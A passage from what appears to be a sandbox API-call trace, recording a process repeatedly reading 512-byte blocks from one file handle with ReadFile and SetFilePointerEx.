lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 
[0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, 
lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 
[0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
